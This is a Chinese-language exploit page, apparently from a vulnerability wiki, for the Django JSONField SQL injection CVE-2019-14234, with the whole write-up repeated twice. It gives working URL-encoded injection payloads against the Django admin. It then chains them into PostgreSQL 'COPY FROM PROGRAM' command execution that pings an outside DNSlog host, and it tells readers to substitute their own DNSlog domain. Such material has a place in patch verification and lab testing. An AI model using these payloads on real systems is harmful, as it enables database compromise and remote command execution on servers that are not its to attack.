CVE-2019-14234_Django_JSONField_SQL注入漏洞

# CVE-2019-14234 Django JSONField SQL注入漏洞

==影響版本==
Django 2.2.x < 2.2.4

Django 2.1.x < 2.1.11

Django 1.11.x < 1.11.23
==漏洞利用==
首先需登錄管理員後臺,訪問模型Collection的管理頁面:
http://127.0.0.1/admin/vuln/collection/
http://127.0.0.1/admin/vuln/collection/?detail__a%27
http://127.0.0.1/admin/vuln/collection/?detail__a%27)%3D%271%27%20or%201%3d1%20--
Django一般與PostgreSQL一起配合使用,可以嘗試利用PostgreSQL 高權限命令執行漏洞[https://www.pwnwiki.org/index.php?title=CVE-2019-9193_PostgreSQL_%E9%AB%98%E6%AC%8A%E9%99%90%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E (CVE-2019-9193)]
訪問以下URL:
http://127.0.0.1/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcreate%20table%20cmd_execs(cmd_output%20text)--%20
回顯no results to fetch 語句成功執行。
訪問:
http://127.0.0.1/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcopy%20cmd_execs%20FROM%20PROGRAM%20%27ping%20test.dnslog.cn%20%27--%20
命令成功執行。

===⚠️️===
test.dnslog.cn請修改爲自己的Dnslog

==影響版本==
Django 2.2.x < 2.2.4

Django 2.1.x < 2.1.11

Django 1.11.x < 1.11.23
==漏洞利用==

首先需登錄管理員後臺,訪問模型Collection的管理頁面:
http://127.0.0.1/admin/vuln/collection/
http://127.0.0.1/admin/vuln/collection/?detail__a%27
http://127.0.0.1/admin/vuln/collection/?detail__a%27)%3D%271%27%20or%201%3d1%20--

Django一般與PostgreSQL一起配合使用,可以嘗試利用PostgreSQL 高權限命令執行漏洞[https://www.pwnwiki.org/index.php?title=CVE-2019-9193_PostgreSQL_%E9%AB%98%E6%AC%8A%E9%99%90%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E (CVE-2019-9193)]

訪問以下URL:
http://127.0.0.1/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcreate%20table%20cmd_execs(cmd_output%20text)--%20

回顯no results to fetch 語句成功執行。

訪問:
http://127.0.0.1/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcopy%20cmd_execs%20FROM%20PROGRAM%20%27ping%20test.dnslog.cn%20%27--%20

命令成功執行。

===⚠️️===

test.dnslog.cn請修改爲自己的Dnslog

© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容